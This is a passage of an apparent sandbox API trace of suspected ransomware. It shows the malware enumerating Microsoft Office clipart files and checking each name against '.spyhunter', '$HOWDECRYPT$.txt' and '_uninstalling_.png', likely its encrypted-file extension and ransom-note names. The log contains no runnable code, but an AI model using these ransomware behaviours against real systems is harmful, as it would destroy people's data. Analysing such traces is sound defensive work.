pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 67 [0098.367] StrStrIW (lpFirst="J0148309.JPG", lpSrch=".spyhunter") returned 0x0 [0098.367] lstrcmpW (lpString1="J0148309.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.371] lstrcmpW (lpString1="J0148309.JPG", lpString2="_uninstalling_.png") returned 1 [0098.371] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 67 [0098.371] GetProcessHeap () returned 0x2c0000 [0098.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c288f8 [0098.371] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27b8) returned 0x2c16890 [0098.372] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.372] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 67 [0098.372] StrStrIW (lpFirst="J0148757.JPG", lpSrch=".spyhunter") returned 0x0 [0098.372] lstrcmpW (lpString1="J0148757.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.372] lstrcmpW (lpString1="J0148757.JPG", lpString2="_uninstalling_.png") returned 1 [0098.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 67 [0098.372] GetProcessHeap () returned 0x2c0000 [0098.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29118 [0098.372] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27c0) returned 0x2c16890 [0098.372] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.372] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 67 [0098.372] StrStrIW (lpFirst="J0148798.JPG", lpSrch=".spyhunter") returned 0x0 [0098.372] lstrcmpW (lpString1="J0148798.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.372] lstrcmpW (lpString1="J0148798.JPG", lpString2="_uninstalling_.png") returned 1 [0098.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 67 [0098.372] GetProcessHeap () returned 0x2c0000 [0098.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c291e8 [0098.372] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27c8) returned 0x2c16890 [0098.372] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.372] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 67 [0098.373] StrStrIW (lpFirst="J0149018.JPG", lpSrch=".spyhunter") returned 0x0 [0098.373] lstrcmpW (lpString1="J0149018.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.373] lstrcmpW (lpString1="J0149018.JPG", lpString2="_uninstalling_.png") returned 1 [0098.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 67 [0098.373] GetProcessHeap () returned 0x2c0000 [0098.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c292b8 [0098.373] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27d0) returned 0x2c16890 [0098.373] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.373] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 67 [0098.373] StrStrIW (lpFirst="J0149118.JPG", lpSrch=".spyhunter") returned 0x0 [0098.373] lstrcmpW (lpString1="J0149118.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.373] lstrcmpW (lpString1="J0149118.JPG", lpString2="_uninstalling_.png") returned 1 [0098.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 67 [0098.373] GetProcessHeap () returned 0x2c0000 [0098.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29388 [0098.373] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27d8) returned 0x2c16890 [0098.373] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.373] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 67 [0098.373] StrStrIW (lpFirst="J0150150.WMF", lpSrch=".spyhunter") returned 0x0 [0098.373] lstrcmpW (lpString1="J0150150.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.373] lstrcmpW (lpString1="J0150150.WMF", lpString2="_uninstalling_.png") returned 1 [0098.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 67 [0098.374] GetProcessHeap () returned 0x2c0000 [0098.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29458 [0098.374] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27e0) returned 0x2c16890 [0098.374] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.374] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 67 [0098.374] StrStrIW (lpFirst="J0150861.WMF", lpSrch=".spyhunter") returned 0x0 [0098.374] lstrcmpW (lpString1="J0150861.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.374] lstrcmpW (lpString1="J0150861.WMF", lpString2="_uninstalling_.png") returned 1 [0098.374] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 67 [0098.374] GetProcessHeap () returned 0x2c0000 [0098.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29528 [0098.374] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27e8) returned 0x2c16890 [0098.374] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.374] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 67 [0098.374] StrStrIW (lpFirst="J0151041.WMF", lpSrch=".spyhunter") returned 0x0 [0098.374] lstrcmpW (lpString1="J0151041.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.374] lstrcmpW (lpString1="J0151041.WMF", lpString2="_uninstalling_.png") returned 1 [0098.374] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 67 [0098.374] GetProcessHeap () returned 0x2c0000 [0098.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c295f8 [0098.375] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27f0) returned 0x2c16890 [0098.375] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.375] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 67 [0098.375] StrStrIW (lpFirst="J0151045.WMF", lpSrch=".spyhunter") returned 0x0 [0098.375] lstrcmpW (lpString1="J0151045.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.375] lstrcmpW (lpString1="J0151045.WMF", lpString2="_uninstalling_.png") returned 1 [0098.375] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 67 [0098.375] GetProcessHeap () returned 0x2c0000 [0098.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c296c8 [0098.375] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27f8) returned 0x2c16890 [0098.375] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.375] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 67 [0098.375] StrStrIW (lpFirst="J0151047.WMF", lpSrch=".spyhunter") returned 0x0 [0098.375] lstrcmpW (lpString1="J0151047.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.375] lstrcmpW (lpString1="J0151047.WMF", lpString2="_uninstalling_.png") returned 1 [0098.375] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 67 [0098.375] GetProcessHeap () returned 0x2c0000 [0098.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29798 [0098.375] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2800) returned 0x2c16890 [0098.376] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.378] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 67 [0098.378] StrStrIW (lpFirst="J0151055.WMF", lpSrch=".spyhunter") returned 0x0 [0098.378] lstrcmpW (lpString1="J0151055.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.378] lstrcmpW (lpString1="J0151055.WMF", lpString2="_uninstalling_.png") returned 1 [0098.378] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 67 [0098.378] GetProcessHeap () returned 0x2c0000 [0098.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29868 [0098.378] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2808) returned 0x2c16890 [0098.379] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.379] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 67 [0098.379] StrStrIW (lpFirst="J0151061.WMF", lpSrch=".spyhunter") returned 0x0 [0098.379] lstrcmpW (lpString1="J0151061.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.379] lstrcmpW (lpString1="J0151061.WMF", lpString2="_uninstalling_.png") returned 1 [0098.379] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 67 [0098.379] GetProcessHeap () returned 0x2c0000 [0098.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29938 [0098.379] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2810) returned 0x2c16890 [0098.379] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.379] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 67 [0098.379] StrStrIW (lpFirst="J0151063.WMF", lpSrch=".spyhunter") returned 0x0 [0098.379] lstrcmpW (lpString1="J0151063.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.379] lstrcmpW (lpString1="J0151063.WMF", lpString2="_uninstalling_.png") returned 1 [0098.379] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 67 [0098.379] GetProcessHeap () returned 0x2c0000 [0098.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1f9e0 [0098.379] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2818) returned 0x2c16890 [0098.380] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.380] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 67 [0098.380] StrStrIW (lpFirst="J0151067.WMF", lpSrch=".spyhunter") returned 0x0 [0098.380] lstrcmpW (lpString1="J0151067.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.380] lstrcmpW (lpString1="J0151067.WMF", lpString2="_uninstalling_.png") returned 1 [0098.380] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 67 [0098.380] GetProcessHeap () returned 0x2c0000 [0098.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1fab0 [0098.380] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2820) returned 0x2c16890 [0098.380] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.380] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 67 [0098.380] StrStrIW (lpFirst="J0151073.WMF", lpSrch=".spyhunter") returned 0x0 [0098.380] lstrcmpW (lpString1="J0151073.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.380] lstrcmpW (lpString1="J0151073.WMF", lpString2="_uninstalling_.png") returned 1 [0098.380] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 67 [0098.380] GetProcessHeap () returned 0x2c0000 [0098.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38c688 [0098.380] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2828) returned 0x2c16890 [0098.380] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.381] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 67 [0098.381] StrStrIW (lpFirst="J0151581.WMF", lpSrch=".spyhunter") returned 0x0 [0098.381] lstrcmpW (lpString1="J0151581.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.381] lstrcmpW (lpString1="J0151581.WMF", lpString2="_uninstalling_.png") returned 1 [0098.381] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 67 [0098.381] GetProcessHeap () returned 0x2c0000 [0098.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c229c8 [0098.381] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2830) returned 0x2c16890 [0098.381] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.381] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 67 [0098.381] StrStrIW (lpFirst="J0152414.WMF", lpSrch=".spyhunter") returned 0x0 [0098.381] lstrcmpW (lpString1="J0152414.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.381] lstrcmpW (lpString1="J0152414.WMF", lpString2="_uninstalling_.png") returned 1 [0098.381] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 67 [0098.381] GetProcessHeap () returned 0x2c0000 [0098.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c22a98 [0098.381] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2838) returned 0x2c16890 [0098.383] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.383] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 67 [0098.383] StrStrIW (lpFirst="J0152430.WMF", lpSrch=".spyhunter") returned 0x0 [0098.383] lstrcmpW (lpString1="J0152430.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.383] lstrcmpW (lpString1="J0152430.WMF", lpString2="_uninstalling_.png") returned 1 [0098.383] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned 67 [0098.383] GetProcessHeap () returned 0x2c0000 [0098.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c22b68 [0098.383] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2840) returned 0x2c16890 [0098.383] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.384] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 67 [0098.384] StrStrIW (lpFirst="J0152432.WMF", lpSrch=".spyhunter") returned 0x0 [0098.384] lstrcmpW (lpString1="J0152432.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.384] lstrcmpW (lpString1="J0152432.WMF", lpString2="_uninstalling_.png") returned 1 [0098.384] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 67 [0098.384] GetProcessHeap () returned 0x2c0000 [0098.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c22c38 [0098.384] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2848) returned 0x2c249b0 [0098.384] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.384] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 67 [0098.384] StrStrIW (lpFirst="J0152436.WMF", lpSrch=".spyhunter") returned 0x0 [0098.384] lstrcmpW (lpString1="J0152436.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.384] lstrcmpW (lpString1="J0152436.WMF", lpString2="_uninstalling_.png") returned 1 [0098.384] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 67 [0098.384] GetProcessHeap () returned 0x2c0000 [0098.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c22d08 [0098.384] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2850) returned 0x2c249b0 [0098.384] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.385] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 67 [0098.385] StrStrIW (lpFirst="J0152556.WMF", lpSrch=".spyhunter") returned 0x0 [0098.385] lstrcmpW (lpString1="J0152556.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.385] lstrcmpW (lpString1="J0152556.WMF", lpString2="_uninstalling_.png") returned 1 [0098.385] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF") returned 67 [0098.385] GetProcessHeap () returned 0x2c0000 [0098.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c22dd8 [0098.385] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2858) returned 0x2c249b0 [0098.385] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.385] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 67 [0098.385] StrStrIW (lpFirst="J0152558.WMF", lpSrch=".spyhunter") returned 0x0 [0098.385] lstrcmpW (lpString1="J0152558.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.385] lstrcmpW (lpString1="J0152558.WMF", lpString2="_uninstalling_.png") returned 1 [0098.385] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF") returned 67 [0098.385] GetProcessHeap () returned 0x2c0000 [0098.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c22ea8 [0098.385] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2860) returned 0x2c249b0 [0098.386] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.386] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 67 [0098.386] StrStrIW (lpFirst="J0152560.WMF", lpSrch=".spyhunter") returned 0x0 [0098.386] lstrcmpW (lpString1="J0152560.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.386] lstrcmpW (lpString1="J0152560.WMF", lpString2="_uninstalling_.png") returned 1 [0098.386] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 67 [0098.386] GetProcessHeap () returned 0x2c0000 [0098.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c22f78 [0098.387] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2868) returned 0x2c249b0 [0098.387] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.387] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 67 [0098.387] StrStrIW (lpFirst="J0152568.WMF", lpSrch=".spyhunter") returned 0x0 [0098.387] lstrcmpW (lpString1="J0152568.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.387] lstrcmpW (lpString1="J0152568.WMF", lpString2="_uninstalling_.png") returned 1 [0098.387] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned 67 [0098.387] GetProcessHeap () returned 0x2c0000 [0098.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23048 [0098.387] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2870) returned 0x2c249b0 [0098.387] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.387] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 67 [0098.387] StrStrIW (lpFirst="J0152570.WMF", lpSrch=".spyhunter") returned 0x0 [0098.387] lstrcmpW (lpString1="J0152570.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.387] lstrcmpW (lpString1="J0152570.WMF", lpString2="_uninstalling_.png") returned 1 [0098.387] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned 67 [0098.387] GetProcessHeap () returned 0x2c0000 [0098.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23118 [0098.387] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2878) returned 0x2c249b0 [0098.388] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.388] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 67 [0098.388] StrStrIW (lpFirst="J0152590.WMF", lpSrch=".spyhunter") returned 0x0 [0098.388] lstrcmpW (lpString1="J0152590.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.388] lstrcmpW (lpString1="J0152590.WMF", lpString2="_uninstalling_.png") returned 1 [0098.388] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 67 [0098.388] GetProcessHeap () returned 0x2c0000 [0098.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c231e8 [0098.388] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2880) returned 0x2c249b0 [0098.388] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.388] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 67 [0098.388] StrStrIW (lpFirst="J0152594.WMF", lpSrch=".spyhunter") returned 0x0 [0098.388] lstrcmpW (lpString1="J0152594.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.388] lstrcmpW (lpString1="J0152594.WMF", lpString2="_uninstalling_.png") returned 1 [0098.388] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF") returned 67 [0098.388] GetProcessHeap () returned 0x2c0000 [0098.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c232b8 [0098.388] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2888) returned 0x2c249b0 [0098.388] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.389] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 67 [0098.389] StrStrIW (lpFirst="J0152600.WMF", lpSrch=".spyhunter") returned 0x0 [0098.389] 